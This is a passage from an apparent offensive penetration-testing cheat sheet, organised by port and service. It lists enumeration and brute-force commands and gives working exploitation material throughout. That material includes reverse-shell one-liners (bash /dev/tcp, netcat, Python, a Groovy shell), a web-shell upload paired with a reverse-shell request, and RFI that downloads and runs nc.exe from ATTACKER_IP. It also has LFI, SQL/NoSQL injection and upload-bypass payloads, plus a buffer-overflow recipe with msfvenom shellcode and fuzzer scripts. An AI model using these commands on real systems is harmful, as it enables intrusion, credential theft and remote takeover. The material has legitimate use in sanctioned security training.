428 | nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111
429 |
430 | enum4linux -a 10.11.1.111
431 |
432 | rpcclient -U "" 10.11.1.111
433 | srvinfo
434 | enumdomusers
435 | getdompwinfo
436 | querydominfo
437 | netshareenum
438 | netshareenumall
439 |
440 | smbclient -L 10.11.1.111
441 | smbclient //10.11.1.111/tmp
442 | smbclient \\\\10.11.1.111\\ipc$ -U john
443 | smbclient //10.11.1.111/ipc$ -U john
444 |
445 | winexe -U username //10.11.1.111 "cmd.exe" --system
446 |
447 | smbtree 10.11.1.111
448 |
449 | nmblookup -A 10.11.1.111
450 |
451 | smbmap -u victim -p s3cr3t -H 10.11.1.111
452 |
453 | Inside \Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml can found user and passwrod, decrypt with "gpp-decrypt "
454 |
455 | Mount SMB in Linux:
456 |
457 | mount -t cifs -o username=user,password=password //10.11.1.111/share /mnt/share
458 | ```
459 |
460 |
461 | ## Port 161/162 UDP - SNMP
462 |
463 | ```
464 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111
465 | snmp-check 10.11.1.111 -c public|private|community
466 |
467 | ```
468 |
469 | ## LDAP - 389,636
470 |
471 | ```
472 | ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"
473 | ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password'
474 | ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password'
475 | patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.'
476 | ```
477 |
478 | ## HTTPS - 443
479 |
480 | Read the actual SSL CERT to:
481 |
482 | - find out potential correct vhost to GET
483 | - is the clock skewed
484 | - any names that could be usernames for bruteforce/guessing.
485 |
486 | ```
487 | sslscan 10.11.1.111:443
488 | ./testssl.sh -e -E -f -p -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html
489 | nmap -sV --script=ssl-heartbleed 10.1.10.111
490 | mod_ssl,OpenSSL version Openfuck
491 | ```
492 |
493 | ## 500 - ISAKMP IKE
494 |
495 | ```
496 | ike-scan 10.11.1.111
497 | ```
498 |
499 | ## 513 - Rlogin
500 |
501 | ```
502 | apt install rsh-client
503 | rlogin -l root 10.11.1.111
504 | ```
505 |
506 | ## 541 - FortiNet SSLVPN
507 |
508 | [Fortinet Ports Guide](https://help.fortinet.com/fos50hlp/54/Content/FortiOS/fortigate-ports-and-protocols-54/Images/FortiGate.png)
509 |
510 | [SSL VPN Leak](https://opensecurity.global/forums/topic/181-fortinet-ssl-vpn-vulnerability-from-may-2019-being-exploited-in-wild/?__cf_chl_jschl_tk__=42e37b31a0585f7dae3dbce18cafde7c39b81976-1578385705-0-AcuYzrPMO1OuMo59JSPYyzZjiXNbMAIl6sKiXwhQRbMUMZq1Kp3VmWqIVXWZdzTZgFCecXue1Z6xXxU-Rql_GT_ovKiar_-i0CUCKFS85bfNXnUzuOuIwomXje-kH87mNbVHzzh9ediRfVWbJjwtO-ttLEYi7quczLlHQk38UqcumrARs77RrK2mj9zOb8Uwhv6av4QZ9od4fgAIl-F4Kff26MPQjs4LRHsgk5zH6RVwFMP8NdOnCrrzkkGH6_R9Dtw89_QtiOsH1nKB0hBDbtJ2O9AkkMDqw7tl1ip_pVDfnw1lvaZtFq1sRqgYwpan-n6n9f58Xdjcj2UGFKdE32OS7Ete8X7RwXUV9FGUSOhAM5_iK0kMNJg3mskrFVQz0lONaZVvFRdf_1rp69J4oRVat1m7KIQEGpRDe4OvYUb7pfQkNKLcK5s_lVIj2SAJQQ)
511 |
512 | ## Port 554 - RTSP
513 |
514 | - Web interface, transfer images, streaming
515 |
516 |
517 | ## Port 1030/1032/1033/1038
518 |
519 | Used by RPC to connect in domain network.
520 |
521 | ## MSSQL - 1433
522 |
523 | ```
524 | nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
525 | use auxiliary/scanner/mssql/mssql_ping
526 | use auxiliary/scanner/mssql/mssql_login
527 | use exploit/windows/mssql/mssql_payload
528 | sqsh -S 10.11.1.111 -U sa
529 | xp_cmdshell 'date'
530 | go
531 |
532 | ```
533 |
534 | ## Port 1521 - Oracle
535 |
536 | ```
537 | oscanner -s 10.11.1.111 -P 1521
538 | tnscmd10g version -h 10.11.1.111
539 | tnscmd10g status -h 10.11.1.111
540 | nmap -p 1521 -A 10.11.1.111
541 | nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute
542 | MSF: good modules under auxiliary/admin/oracle and scanner/oracle
543 |
544 | ./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521
545 | ./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521
546 | ./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE
547 |
548 | Upload reverse shell with ODAT:
549 | ./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe
550 |
551 | and run it:
552 | ./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe
553 |
554 |
555 | ```
556 |
557 | ## Port 2049 - NFS
558 |
559 | ```
560 | showmount -e 10.11.1.111
561 |
562 | If you find anything you can mount it like this:
563 |
564 | mount 10.11.1.111:/ /tmp/NFS
565 | mount -t 10.11.1.111:/ /tmp/NFS
566 | ```
567 |
568 | ## Port 2100 - Oracle XML DB
569 |
570 | ```
571 | FTP:
572 | sys:sys
573 | scott:tiger
574 | ```
575 |
576 | Default passwords
577 | https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
578 |
579 |
580 | ## 3306 - MySQL
581 |
582 | ```
583 | nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306
584 |
585 | mysql --host=10.11.1.111 -u root -p
586 |
587 | MYSQL UDF
588 | https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
589 | ```
590 |
591 | ## Port 3339 - Oracle web interface
592 |
593 |
594 | - Basic info about web service (apache, nginx, IIS)
595 |
596 | ## RDP - 3389
597 |
598 | ```
599 | nmap -p 3389 --script=rdp-vuln-ms12-020.nse
600 | rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111
601 | rdesktop -u guest -p guest 10.11.1.111 -g 94%
602 | ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111
603 | ```
604 |
605 | ## VNC - 5900
606 |
607 | ```
608 | nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111
609 | ```
610 |
611 | ## WinRM - 5985
612 |
613 | ```
614 | https://github.com/Hackplayers/evil-winrm
615 | gem install evil-winrm
616 | evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
617 | evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder
618 | ```
619 |
620 | ## Redis - 6379
621 |
622 | ```
623 | https://github.com/Avinash-acid/Redis-Server-Exploit
624 | python redis.py 10.10.10.160 redis
625 | ```
626 |
627 | ## MsDeploy - 8172
628 |
629 | ```
630 | Microsoft IIS Deploy port
631 | IP:8172/msdeploy.axd
632 | ```
633 |
634 | ## Webdav
635 |
636 | ```
637 | davtest -cleanup -url http://target
638 | cadaver http://target
639 | ```
640 |
641 | ## Unknown ports
642 |
643 | - `amap -d 10.11.1.111 8000`
644 | - netcat: makes connections to ports. Can echo strings or give shells: `nc -nv 10.11.1.111 110`
645 | - sfuzz: can connect to ports, udp or tcp, refrain from closing a connection, using basic HTTP configurations
646 | - Try zone transfer for subdomains: `dig axfr @10.11.1.111 hostname.box`, `dnsenum 10.11.1.111`, `dnsrecon -d domain.com -t axfr`
647 |
648 | Try admin:admin, user:user
649 |
650 | ## Port 80 - Web server
651 |
652 | - Basics:
653 | - Navigate && robots.txt
654 | - Headers
655 | - Source Code
656 |
657 | ```
658 | # Nikto
659 | nikto -h http://10.11.1.111
660 |
661 | # Nikto with squid proxy
662 | nikto -h 10.11.1.111 -useproxy http://10.11.1.111:4444
663 |
664 | # CMS Explorer
665 | cms-explorer -url http://10.11.1.111 -type [Drupal, WordPress, Joomla, Mambo]
666 |
667 | # WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)
668 | wpscan --url http://10.11.1.111
669 | wpscan --url http://10.11.1.111 --enumerate vp
670 | wpscan --url http://10.11.1.111 --enumerate vt
671 | wpscan --url http://10.11.1.111 --enumerate u
672 | wpscan -e --url https://url.com
673 |
674 |
675 | Check IP behing WAF:
676 | https://IP.com/2020/01/22/discover-cloudflare-wordpress-ip/
677 | pingback.xml:
678 |
679 |
680 | pingback.ping
681 |
682 |
683 |
684 | http://10.0.0.1/hello/world
685 |
686 |
687 |
688 |
689 | https://IP.com/2020/01/22/hello-world/
690 |
691 |
692 |
693 |
694 |
695 | curl -X POST -d @pingback.xml https://ip.com/xmlrpc.php
696 |
697 | Enum User:
698 | for i in {1..50}; do curl -s -L -i https://ip.com/wordpress\?author=$i | grep -E -o "Location:.*" | awk -F/ '{print $NF}'; done
699 |
700 | # Joomscan
701 | joomscan -u http://10.11.1.111
702 | joomscan -u http://10.11.1.111 --enumerate-components
703 |
704 | # Get header
705 | curl -i 10.11.1.111
706 |
707 | # Get options
708 | curl -i -X OPTIONS 10.11.1.111
709 |
710 | # With PUT option enabled:
711 |
712 | nmap -p 80 10.1.10.111 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'
713 |
714 | curl -v -X PUT -d '' http://10.1.10.111/test/cmd.php
715 | && http://10.1.10.111/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%210.1.10.111%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
716 |
717 | # Get everything
718 | curl -i -L 10.11.1.111
719 | curl -i -H "User-Agent:Mozilla/4.0" http://10.11.1.111:8080
720 |
721 | # Check for title and all links
722 | curl 10.11.1.111 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
723 |
724 | # Look at page with just text
725 | curl 10.11.1.111 -s -L | html2text -width '99' | uniq
726 |
727 | # Check if it is possible to upload
728 | curl -v -X OPTIONS http://10.11.1.111/
729 | curl -v -X PUT -d '' http://10.11.1.111/test/shell.php
730 |
731 | # Simple curl POST request with login data
732 | curl -X POST http://10.11.1.11/centreon/api/index.php?action=authenticate -d 'username=centreon&password=wall'
733 |
734 | dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix
735 |
736 | site:domain.com intext:user
737 |
738 |
739 | # Firebase
740 | https://github.com/Turr0n/firebase
741 | python3 firebase.py -p 4 --dnsdumpster -l file
742 |
743 | ```
744 |
745 | ### Url brute force
746 |
747 | ```
748 | # Ffuf
749 | ffuf -c -e '.htm','.php','.html','.js','.txt','.zip','.bak','.asp','.aspx','xml','.log' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u https://10.11.1.11/mvc/FUZZ
750 |
751 | # Dirb not recursive
752 | dirb http://10.11.1.111 -r -o dirb-10.11.1.111.txt
753 |
754 | # Wfuzz
755 | wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.11.1.11/FUZZ
756 |
757 | # GoBuster
758 | gobuster dir -u http://10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
759 | gobuster dir -e -u http://10.11.1.111/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
760 | gobuster dir -u http://$10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txt
761 | gobuster dir -e -u http://10.11.1.111/ -w /usr/share/wordlists/dirb/common.txt
762 |
763 | dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix
764 |
765 | ./dirsearch.py -u 10.10.10.157 -e php
766 |
767 | medusa -h 10.11.1.111 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
768 |
769 | Crawl:
770 |
771 | dirhunt https://url.com/
772 | hakrwaler https://url.com/
773 |
774 | Fuzzer:
775 |
776 | ffuf -recursion -c -e '.htm','.php','.html','.js','.txt','.zip','.bak','.asp','.aspx','.xml' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u https://url.com/FUZZ
777 |
778 | dirsearch -r -f -u https://crm.comprarcasa.pt --extensions=htm,html,asp,aspx,txt -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --request-by-hostname -t 40
779 |
780 | #IIS
781 | #ViewState:
782 | https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC
783 |
784 | #WebResource.axd:
785 | https://github.com/inquisb/miscellaneous/blob/master/ms10-070_check.py
786 |
787 | #ShortNames
788 | https://github.com/irsdl/IIS-ShortName-Scanner
789 | java -jar iis_shortname_scanner.jar 2 20 http://domain.es
790 |
791 | #Jenkins
792 | JENKINSIP/PROJECT//securityRealm/user/admin
793 | JENKINSIP/jenkins/script
794 |
795 | #Groovy RCE
796 | def process = "cmd /c whoami".execute();println "${process.text}";
797 | #Groovy RevShell
798 | String host="localhost";
799 | int port=8044;
800 | String cmd="cmd.exe";
801 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
802 |
803 | # Joomscan
804 | joomscan -u http://10.11.1.111
805 | joomscan -u http://10.11.1.111 --enumerate-components
806 |
807 | # PHP bypass disable_functions and open_basedir
808 | # Chankro
809 | https://github.com/TarlogicSecurity/Chankro
810 | python2 chankro.py --arch 64 --input rev.sh --output chan.php --path /var/www/html
811 |
812 | # Cookies error padding:
813 | # Get cookie structure
814 | padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding"
815 | # Get cookie for other user (impersonation)
816 | padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorme'
817 | ```
818 |
819 |
820 | ### Default/Weak login
821 |
822 | Search documentation for default passwords and test them
823 |
824 | ```
825 | site:webapplication.com password
826 | ```
827 |
828 | ```
829 | admin admin
830 | admin password
831 | admin
832 | admin
833 | root root
834 | root admin
835 | root password
836 | root
837 | password
838 | admin
839 | username
840 | username
841 | ```
842 |
843 |
844 | ### LFI/RFI
845 |
846 |
847 | ```
848 | fimap -u "http://10.11.1.111/example.php?test="
849 |
850 | # Ordered output
851 | curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
852 | /root/Tools/Kadimus/kadimus -u http://10.11.1.111/example.php?page=
853 |
854 | http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
855 | http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ?
856 | ?page=php://filter/convert.base64-encode/resource=../config.php
857 | ../../../../../boot.ini
858 |
859 | amap -d 10.11.1.111 8000
860 |
861 | # LFI Windows
862 | http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
863 |
864 | # Contaminating log files
865 | root@kali:~# nc -v 10.11.1.111 80
866 | 10.11.1.111: inverse host lookup failed: Unknown host
867 | (UNKNOWN) [10.11.1.111] 80 (http) open
868 |
869 |
870 | http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
871 |
872 | # RFI:
873 | http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00
874 | Content of evil.txt:
875 |
876 |
877 | # PHP Filter:
878 | http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config
879 |
880 | # RFI over SMB (Windows)
881 | cat php_cmd.php
882 |
883 | - Start SMB Server in attacker machine and put evil script
884 | - Access it via browser (2 request attack):
885 | - http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"
886 | - http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234
887 |
888 | ```
889 |
890 | ### SQL-Injection
891 |
892 | ```
893 | # References
894 | https://www.exploit-db.com/papers/17934
895 | https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
896 |
897 | # Post
898 | ./sqlmap.py -r search-test.txt -p tfUPass
899 |
900 | # Get
901 | sqlmap -u "http://10.11.1.111/index.php?id=1" --dbms=mysql
902 |
903 | # Crawl
904 | sqlmap -u http://10.11.1.111 --dbms=mysql --crawl=3
905 |
906 | # Full auto - THE GOOD ONE
907 | sqlmap -u 'http://10.11.1.111:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch
908 | # Columns
909 | sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --columns -T users -D admin
910 | # Values
911 | sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --dump -T users -D admin
912 |
913 | sqlmap -o -u "http://10.11.1.111:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords
914 |
915 | # NoSQL
916 | ' || 'a'=='a
917 | mongodbserver:port/status?text=1
918 |
919 | #in URL
920 | username[$ne]=toto&password[$ne]=toto
921 |
922 | #in JSON
923 | {"username": {"$ne": null}, "password": {"$ne": null}}
924 | {"username": {"$gt":""}, "password": {"$gt":""}}
925 |
926 | ## SSRF
927 |
928 | web that send request to external IP's, we call 127.0.0.1:8080 / 10.1.10.111 to enum internal network
929 |
930 | chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:3000
931 | GET /ssrf?user=&comment=&link=http://127.0.0.1:3000 HTTP/1.1
932 |
933 | Also we can enum ports
934 | ```
935 |
936 | ### XSS
937 |
938 | ```
939 |
940 |
941 |
942 | https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html?m=1
943 |
944 | "
945 |
946 | "
947 |
948 | # XXE
949 |
950 | XML entry that reads server, Doctype, change to entity "System "file:///etc/passwd""
951 |
952 | Instead POST:
953 |
954 |
955 |
957 |
958 | ]>
959 | Hack The &book;
960 |
961 | Malicious XML:
962 |
963 |
964 | ]>Hack The
965 | %26book%3B
966 |
967 | XXE OOB
968 |
969 |
970 | %dtd;]>
971 | %26send%3B
972 | ```
973 |
974 | ### Sql-login-bypass
975 |
976 | - Open Burp-suite
977 | - Make and intercept a request
978 | - Send to intruder
979 | - Cluster attack.
980 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
981 | - Attack
982 | - Check for response length variation
983 |
984 | ### Bypass image upload restrictions
985 |
986 | ```
987 | - Change extension: .pHp3 or pHp3.jpg
988 | - Modify mimetype: Content-type: image/jpeg
989 | - Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg
990 | - Add gif header: GIF89a;
991 | - All at the same time.
992 | ```
993 |
994 | ## Password brute force - last resort
995 |
996 | Offline local resources
997 |
998 | ```
999 | cewl
1000 | hash-identifier
1001 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
1002 | medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
1003 | ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
1004 | crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
1005 | hydra -l root -P password-file.txt 10.11.1.111 ssh
1006 | hydra -P password-file.txt -v 10.11.1.111 snmp
1007 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
1008 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
1009 | hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V
1010 |
1011 | # SIMPLE LOGIN GET
1012 | hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V
1013 |
1014 | # GET FORM with HTTPS
1015 | hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"
1016 |
1017 | # SIMPLE LOGIN POST
1018 | hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
1019 |
1020 | # API REST LOGIN POST
1021 | hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64
1022 |
1023 | # Dictionary creation
1024 | https://github.com/LandGrey/pydictor
1025 | https://github.com/Mebus/cupp
1026 | git clone https://github.com/sc0tfree/mentalist.git
1027 | ```
1028 |
1029 | Online crackers
1030 |
1031 | ```
1032 | https://hashkiller.co.uk/Cracker
1033 | https://www.cmd5.org/
1034 | https://www.onlinehashcrack.com/
1035 | https://gpuhash.me/
1036 | https://crackstation.net/
1037 | https://crack.sh/
1038 | https://hash.help/
1039 | https://passwordrecovery.io/
1040 | http://cracker.offensive-security.com/
1041 | ```
1042 |
1043 | # **Vulnerability analysis**
1044 |
1045 | ## BOF
1046 |
1047 | ```
1048 | # BASIC GUIDE
1049 | 1. Send "A"*1024
1050 | 2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH
1051 | 3. When crash "!mona findmsp" (E10.11.1.111 offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip"
1052 | 4. Confirm the location with "B" and "C"
1053 | 5. Check for badchars instead CCCC (ESP):
1054 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
1055 | with script _badchars.py and
1056 | "!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin"
1057 | 5.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/):
1058 | a. !mona config -set workingfolder c:\logs\%p
1059 | b. !mona bytearray -b "\x00\x0d"
1060 | c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again
1061 | d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address)
1062 | e. In " data", before unicode chars it shows badchars.
1063 | 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE"
1064 |
1065 | 6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE"
1066 | 6.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f
1067 |
1068 |
1069 | 7. Generate shellcode and place it:
1070 | msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00"
1071 |
1072 | msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode
1073 |
1074 | 8. Final buffer like:
1075 | buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
1076 |
1077 | ```
1078 |
1079 |
1080 |
1081 | ```
1082 | ################ sample 1 ################################################
1083 | #!/usr/bin/python
1084 |
1085 | import socket,sys
1086 |
1087 | if len(sys.argv) != 3:
1088 | print("usage: python fuzzer.py 10.11.1.111 PORT")
1089 | exit(1)
1090 |
1091 | payload = "A" * 1000
1092 |
1093 | ipAddress = sys.argv[1]
1094 | port = int(sys.argv[2])
1095 |
1096 | try:
1097 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1098 | s.connect((ipAddress, port))
1099 | s.recv(1024)
1100 | print "Sending payload"
1101 | s.send(payload)
1102 | print "Done"
1103 | s.close()
1104 | except:
1105 | print "Error"
1106 | sys.exit(0)
1107 |
1108 | ################ sample 2 ################################################
1109 | #!/usr/bin/python
1110 | import time, struct, sys
1111 | import socket as so
1112 |
1113 | try:
1114 | server = sys.argv[1]
1115 | port = 5555
1116 | except IndexError:
1117 | print "[+] Usage %s host" % sys.argv[0]
1118 | sys.exit()
1119 |
1120 | req1 = "AUTH " + "\x41"*1072
1121 | s = so.socket(so.AF_INET, so.SOCK_STREAM)
1122 | try:
1123 | s.connect((server, port))
1124 | print repr(s.recv(1024))
1125 | s.send(req1)
1126 | print repr(s.recv(1024))
1127 | except:
1128 | print "[!] connection refused, check debugger"
1129 | s.close()
1130 | ```
1131 |
1132 |
1133 |
1134 | ## Find xploits - Searchsploit and google
1135 |
1136 | Where there are many exploits for a software, use google. It will automatically sort it by popularity.
1137 |
1138 | ```bash
1139 | site:exploit-db.com apache 2.4.7
1140 |
1141 | # Remove dos-exploits
1142 |
1143 | searchsploit Apache 2.4.7 | grep -v '/dos/'
1144 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"
1145 |
1146 | # Only search the title (exclude the path), add the -t
1147 | searchsploit -t Apache | grep -v '/dos/'
1148 | ```
1149 |
1150 | ## Reverse Shells
1151 |
1152 | ```bash
1153 | # Linux
1154 | bash -i >& /dev/tcp/10.11.1.111/4443 0>&1
1155 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.111 4443 >/tmp/f
1156 | nc -e /bin/sh 10.11.1.111 4443
1157 |
1158 | # Python
1159 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.111",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1160 |
1161 | __import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\
1162 |
1163 | # Perl
